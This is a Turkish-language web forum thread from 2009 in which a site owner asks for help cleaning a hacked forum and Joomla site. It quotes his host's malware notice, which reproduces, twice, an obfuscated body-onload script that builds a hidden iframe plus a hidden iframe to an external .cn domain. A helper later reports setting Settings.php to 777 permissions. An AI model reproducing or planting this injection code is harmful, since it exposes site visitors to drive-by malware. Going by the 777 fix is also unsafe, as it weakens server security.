Otsikko: Trojan
Kirjoitti: samet_1905 - kesäkuu 14, 2009, 06:15:10 AP
Kirjoitti: samet_1905 - kesäkuu 14, 2009, 06:15:10 AP
Ne denedimse olmadı arkadaşlar uzun zamandır ugrasıyorum ama çözemedım ..Şimdi buraya yazıcam tüm denedıklerımı ...
Ekstra fikri olan varsa paylaşırsa sevınırım .Yıne olmazsa sanırım forum uçucak hersey başa dönucek ....
İlk başlarda googlede sıtem zararlı olarak gözukmeye basladı erısım kesıldı 3-5 ay evvel ...
Hostıng fırmam İHS telekoma bıldırdım bana şu şekilde bır mesaj attılar ...
Merhaba,
/var/www/vhosts/tokatsporluyuz.net/httpsdocs/index.html: Exploit.HTML.IFrame-6 FOUND
Web sitenizin kaynak kodunda <body> bölümünde aşağıdaki kod inject edilmiş görünmektedir. Sanırım probleminizin sebebi bu koddan kaynaklanıyor. Aşağıdaki kodu <body> olarak değiştirdiğinizde problemin çözülmesi muhtemeldir.
<body onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh='t';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab='src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);"><iframe src="http://litetopfindworld.cn/in.cgi?cocacola32" width=1 height=1 style="visibility: hidden"></iframe>
İyi Çalışmalar
Belirttikleri kodu o dizinen kaldırdım , ftp şifremı degstırdım googlede indexi tazeleyınce sorun kalkar dıye dusunuyordum ... Ama google kaldırmadı ..Bende tekrar bütün indexleri ve bazı dosyaları kontrol ettım ama iframe vs herhangı bır sey bulamadım ...
En son ftp i komple bılgısayarıma ındırdım ...
Advanced Find and Replace 4 programı ile şu kelimeleri
IFrame
script
gpt0.ru
body vsvs bunları tektek gezdım
6 değişik antivürüs programı ıle tarattım ftp i sonuş dosyalar temiz oldu ...
sonra ftp den tektek butun dızınlerı tekrar gezdım şöyle bir manzarayla karsılastım ...
index.php dosyamın yanında index.PHP~ Dosyası seklınde bır dosya daha ..
sources klasöru ıcınde ise ;
Display.php , ManageMembergroups.php , ManageAttachments.php , ManageNews , PersonalMessage.php , Post.php , Profile.php , QueryString.php , Search.php , Subs.php , Subs-Boards ve Subs-Post bunların hepsının ısımlerının yanına PHP~ eklenerek ıkıncı bır dosya olusmus . Ne kadar bulduysam bu şekilde dosya sıldım ama duzelme olmadı ....
Forum içinde aktıf olarak sıkıntı olusturmuyor bunlar . Fakat forum menusunde üyelere tıkladıkdan sonra üyelerde ara dedıgım an alttakı resımde alt kısma dıkkat edin gpt0.ru ısımlı dosyaya yonlendırılıyor dıyor .
gpt0.ru uzantısı hatta ru uzantısını dahı tektek kontrol ettım forum içinde ama bulamadım :'(...
yukardakı resmın devamındada sayfam böyle oluyor ..
ve en sonda şu şekili alıyor ...
Joomlada vardı sistemde silmiştim komple ... Şimdi tekrar yukledım .Joomladada içerik girmeme izin vermıyor aynı şekilde sayfayı temasız gösterıyor sonra vırus sayfasına yonlendırıyor ....
Yardımcı olma şansı olan varmı epeydır ugrasıyorum bakmadıgım döküman kalmadı ama ru uzantılı dosyalar yayılmaya baslıyor ve o kadar aramama tektek bakmama ragmen bulamıorum :S
php~ dosyaları ıle ılgılı bır ıkı örnek koyuyorum eke ılgılınene arkadaslar kontrol ederse sevınırım ....
Ekstra fikri olan varsa paylaşırsa sevınırım .Yıne olmazsa sanırım forum uçucak hersey başa dönucek ....
İlk başlarda googlede sıtem zararlı olarak gözukmeye basladı erısım kesıldı 3-5 ay evvel ...
Hostıng fırmam İHS telekoma bıldırdım bana şu şekilde bır mesaj attılar ...
Merhaba,
/var/www/vhosts/tokatsporluyuz.net/httpsdocs/index.html: Exploit.HTML.IFrame-6 FOUND
Web sitenizin kaynak kodunda <body> bölümünde aşağıdaki kod inject edilmiş görünmektedir. Sanırım probleminizin sebebi bu koddan kaynaklanıyor. Aşağıdaki kodu <body> olarak değiştirdiğinizde problemin çözülmesi muhtemeldir.
<body onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh='t';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab='src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);"><iframe src="http://litetopfindworld.cn/in.cgi?cocacola32" width=1 height=1 style="visibility: hidden"></iframe>
İyi Çalışmalar
Belirttikleri kodu o dizinen kaldırdım , ftp şifremı degstırdım googlede indexi tazeleyınce sorun kalkar dıye dusunuyordum ... Ama google kaldırmadı ..Bende tekrar bütün indexleri ve bazı dosyaları kontrol ettım ama iframe vs herhangı bır sey bulamadım ...
En son ftp i komple bılgısayarıma ındırdım ...
Advanced Find and Replace 4 programı ile şu kelimeleri
IFrame
script
gpt0.ru
body vsvs bunları tektek gezdım
6 değişik antivürüs programı ıle tarattım ftp i sonuş dosyalar temiz oldu ...
sonra ftp den tektek butun dızınlerı tekrar gezdım şöyle bir manzarayla karsılastım ...
index.php dosyamın yanında index.PHP~ Dosyası seklınde bır dosya daha ..
sources klasöru ıcınde ise ;
Display.php , ManageMembergroups.php , ManageAttachments.php , ManageNews , PersonalMessage.php , Post.php , Profile.php , QueryString.php , Search.php , Subs.php , Subs-Boards ve Subs-Post bunların hepsının ısımlerının yanına PHP~ eklenerek ıkıncı bır dosya olusmus . Ne kadar bulduysam bu şekilde dosya sıldım ama duzelme olmadı ....
Forum içinde aktıf olarak sıkıntı olusturmuyor bunlar . Fakat forum menusunde üyelere tıkladıkdan sonra üyelerde ara dedıgım an alttakı resımde alt kısma dıkkat edin gpt0.ru ısımlı dosyaya yonlendırılıyor dıyor .
gpt0.ru uzantısı hatta ru uzantısını dahı tektek kontrol ettım forum içinde ama bulamadım :'(...
yukardakı resmın devamındada sayfam böyle oluyor ..
ve en sonda şu şekili alıyor ...
Joomlada vardı sistemde silmiştim komple ... Şimdi tekrar yukledım .Joomladada içerik girmeme izin vermıyor aynı şekilde sayfayı temasız gösterıyor sonra vırus sayfasına yonlendırıyor ....
Yardımcı olma şansı olan varmı epeydır ugrasıyorum bakmadıgım döküman kalmadı ama ru uzantılı dosyalar yayılmaya baslıyor ve o kadar aramama tektek bakmama ragmen bulamıorum :S
php~ dosyaları ıle ılgılı bır ıkı örnek koyuyorum eke ılgılınene arkadaslar kontrol ederse sevınırım ....
Otsikko: Re: Trojan
Kirjoitti: DNA27 - kesäkuu 14, 2009, 06:20:03 AP
Kirjoitti: DNA27 - kesäkuu 14, 2009, 06:20:03 AP
püff oku oku bitmiyor..
ilk olarak ne kadar sürdü bu işlemi yapıp googleyı ne kadar bekledın anında kalkmaz.
~ bu uzantı dosya yedegini gösterir. o dosyalarda değişiklik yapmışsın o da yedek almış o sorun değil..
ilk olarak ne kadar sürdü bu işlemi yapıp googleyı ne kadar bekledın anında kalkmaz.
~ bu uzantı dosya yedegini gösterir. o dosyalarda değişiklik yapmışsın o da yedek almış o sorun değil..
Otsikko: Re: Trojan
Kirjoitti: samet_1905 - kesäkuu 14, 2009, 06:22:53 AP
Kirjoitti: samet_1905 - kesäkuu 14, 2009, 06:22:53 AP
Lainaus käyttäjältä: DNA27 - kesäkuu 14, 2009, 06:20:03 AP
püff oku oku bitmiyor..
ilk olarak ne kadar sürdü bu işlemi yapıp googleyı ne kadar bekledın anında kalkmaz.
~ bu uzantı dosya yedegini gösterir. o dosyalarda değişiklik yapmışsın o da yedek almış o sorun değil..
O kadar uğraştımki yazıyımda bıryere rahatlıyım dedım : )
Google ile ilgili kısmı 3-5 ay evvel çözmüştük hostıng fırmamda böyle söllemıstı indexlendıgı zaman duzelır demıstı bu kadr uzun suredır sıteme ugramama ıhtımalı olmaz cunku google anasayfamdakı sıte baslıgı degısıklıklerını gosterıyor ...
Ayrıca sadece google ıle baglantılı deıl durum forum ıcındede sorun var resımlerle gösterdıgım şekilde onu çözsem muhtemelen bütün sorunlar ortadan kalkıcak
Otsikko: Re: Trojan
Kirjoitti: DNA27 - kesäkuu 14, 2009, 06:28:21 AP
Kirjoitti: DNA27 - kesäkuu 14, 2009, 06:28:21 AP
panelden oraya mı yönlendirilmiş acaba 2 . bir fikir virüs yapmıs olabılırmı ama baya kontrol etmıssın temız..
bir kontrol edelim. şimdi index.html die bir dosya at ftp ye içine bir şeyler yaz krala .
virüsmü yönlendiriyor panelden mi bakalım bir
bir kontrol edelim. şimdi index.html die bir dosya at ftp ye içine bir şeyler yaz krala .
virüsmü yönlendiriyor panelden mi bakalım bir
Otsikko: Re: Trojan
Kirjoitti: samet_1905 - kesäkuu 14, 2009, 06:32:58 AP
Kirjoitti: samet_1905 - kesäkuu 14, 2009, 06:32:58 AP
Buraya normal giriyor sımdı attım indexi deneme dıye klasör acıp
http://www.tokatsporluyuz.net/deneme/index.html
http://www.tokatsporluyuz.net/deneme/index.html
Otsikko: Re: Trojan
Kirjoitti: DNA27 - kesäkuu 14, 2009, 06:45:21 AP
Kirjoitti: DNA27 - kesäkuu 14, 2009, 06:45:21 AP
demekki dosyalarında bir problem var gibi tekrar bir kontrol et yda uzman ları bekleyelım..
Otsikko: Re: Trojan
Kirjoitti: samet_1905 - kesäkuu 14, 2009, 06:49:02 AP
Kirjoitti: samet_1905 - kesäkuu 14, 2009, 06:49:02 AP
DNA27 Teşekkür ettim sağol ...
Hani temadan desem defaulttada aynı seyı yapıor ....Joomladada panele gırıyorum ama ıcerık ekleyemıorum menuyu degıstıremıorum :S
Ne bela bıseydır ne kadar trojan örnegı varsa ısımlerını tektek aradım ama yok :S
Hani temadan desem defaulttada aynı seyı yapıor ....Joomladada panele gırıyorum ama ıcerık ekleyemıorum menuyu degıstıremıorum :S
Ne bela bıseydır ne kadar trojan örnegı varsa ısımlerını tektek aradım ama yok :S
Otsikko: Re: Trojan
Kirjoitti: DNA27 - kesäkuu 14, 2009, 06:50:41 AP
Kirjoitti: DNA27 - kesäkuu 14, 2009, 06:50:41 AP
sen beni bir ekle msn den :) bakak beraber pc ine girerek :)
Otsikko: Re: Trojan
Kirjoitti: samet_1905 - kesäkuu 14, 2009, 07:45:32 AP
Kirjoitti: samet_1905 - kesäkuu 14, 2009, 07:45:32 AP
Hocam elıne saglık ugrastırdık senıde o kadar kontrol ettın gordun sende bela bısey ....
Yedekleyıp komple yenıden hayata gecıorum mecburen
Yedekleyıp komple yenıden hayata gecıorum mecburen
Otsikko: Re: Trojan
Kirjoitti: DNA27 - kesäkuu 14, 2009, 08:20:18 AP
Kirjoitti: DNA27 - kesäkuu 14, 2009, 08:20:18 AP
Settings.php ye 777 izin verdik düzeldi forum..
Memberlist.php ve Memberlist.template.php sıfırldık kontrol ettik
yine aynı hata ..
üyeler de ara ' da hata var sadece...
Memberlist.php ve Memberlist.template.php sıfırldık kontrol ettik
yine aynı hata ..
üyeler de ara ' da hata var sadece...
Otsikko: Re: Trojan
Kirjoitti: samet_1905 - kesäkuu 14, 2009, 08:29:21 AP
Kirjoitti: samet_1905 - kesäkuu 14, 2009, 08:29:21 AP
Mecburen sılıyoruz :D